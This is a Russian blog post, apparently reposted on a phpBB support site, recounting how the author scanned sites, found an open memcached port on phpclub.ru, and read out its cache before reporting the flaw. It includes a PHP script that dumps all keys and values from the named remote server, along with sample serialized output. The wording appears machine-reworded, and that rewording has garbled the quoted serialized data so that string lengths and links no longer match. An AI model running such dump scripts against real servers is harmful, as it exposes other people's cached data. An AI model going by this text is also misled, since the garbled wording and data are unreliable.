Главная
Блог разработчиков phpBB
 
+ 17 предустановленных модов
+ SEO-оптимизация форума
+ авторизация через соц. сети
+ защита от спама

Как я обнаружил уязвимость на phpclub.ru

Anna | 31.05.2014 | нет комментариев

Тихим, теплым, вечером разрабатывая систему кэширования через memcached и добавляя сервер меня внезапно посетила мысль.

С чего все начиналось

А все началось с того, что я перешел с Debian семейства к семейству RHEL. Приблизительно неделю назад я 1-й раз своими руками(не могу сказать что на Ubuntu это было своими руками) поднял сервер для разработки плана. Я своими руками правил конфиги nginx, apache, php — прежде на Ubuntu все ставилось в пару команд и работало само. Однако, правя конфиги, я стал отменнее понимать, как оно там все работает. Вероятно это меня и подтолкнуло к мысли о memcached.

Поиск цели

Вначале я безусловно проэкспериментировал(поставил memcached из rpm и позабыл) на своей машине и не был поражен итогом, так как сама спецтехнология подразумевает масштабирование серверами и не предусматривает авторизацию. Но я крепко сомневался, что кто-то оставит такую дыру в настоящем плане. Но мне ничто не мешало проверить это. В качестве сканера портов я применял nmap. Да извинит меня НЛО первым в очереди был habrahabr.ru, но он хорошо прошел испытание, а вот попытка номер 4:

11211 порт открыт. К действию

Я написал небольшой скрипт на локальной машине и триумф:

Малость доработав скрипт:

Вот и он

$t= new Memcached ();
$t->addServer('phpclub.ru', 11211);
$z=$t->getAllKeys();
foreach($z as $k=>$v){
var_dump($t->get($v));
echo $v,'---',$k,"n";
}

Был получен дюже многообещающий для хакера итог: все данные были сериализованны. Я принялся исследовать данные, в них мне удалось распознать кеш для меню раздела faq.
А вот и он:

linktracking|i:0;bookmarks|a:5:{i:0;s:11:"((Каталог))";i:1;s:13:"((Метаморфозы))";i:2;s:20:"((НовыеКомментарии))";i:3;s:16:"((Пользователи))";i:4;s:27:"((Регистрация Регистрация))";}bookmarklinks|a:5:{i:0;s:7:"katalog";i:1;s:10:"izmenenija";i:2;s:16:"novyekommentarii";i:3;s:12:"pol_zovateli";i:4;s:12:"registracija";}bookmarksfmt|s:157:"ўўКаталог ==КаталогЇЇ | ўўИзменения ==ИзмененияЇЇ | ўўНовыеКомментарии ==НовыеКомментарииЇЇ | ўўХакИрФсимагущий ==рулит!!!ЇЇ | ўўРегистрация ==РегистрацияЇЇ";show_comments|a:1:{s:24:"qhelp/HowToDisplayErrors";i:0;}'

Добросовестно-Добросовестно, он прямо вот так и выглядел! Всякие совпадения считать случайностью.
А вот как выглядит страничка с таким кешем:

А что дальше?

А что не происходило дальше и как я не использовал волшебные способы toString и destruct рассказано не будет, этика не в этом ;)
Безусловно, я сразу попытался выйти на связь с админом, известил об уязвимости и на данный момент она закрыта.

Этика:
Закрытие порта от внешних сетей не хитроумная вещь, но даже джедаи phpclub.ru могут упустить ее из виду. Данный случай, настоящий пример из жизни показывающий, что люди могут заблуждаться даже в таких казалось бы элементарных, явственных вещах. Доверяйте безопасность и конфигурирование сервера специалистам.

И не надейтесь на то, что ваш ip(даже без привязанного к нему домена) адрес не просканируют.

Сотни джедаев habrauser’ов теснее в пути, а за ними и армия клонов ботов.
P.S.
И кто знает сколько еще велосипедов построено на просторах интернета и сколько из них закрыли доступ к memcached с внешних ip…
Кто знает…

Источник: programmingmaster.ru

Оставить комментарий
БАЗА ЗНАНИЙ
СЛУЧАЙНАЯ СТАТЬЯ
СЛУЧАЙНЫЙ БЛОГ
СЛУЧАЙНЫЙ МОД
СЛУЧАЙНЫЙ СКИН
НОВЫЕ МОДЫ
НОВЫЕ СКИНЫ
НАКОПЛЕННЫЙ ОПЫТ
Форум phpBB, русская поддержка форума phpBB
Рейтинг@Mail.ru 2008 - 2017 © BB3x.ru - русская поддержка форума phpBB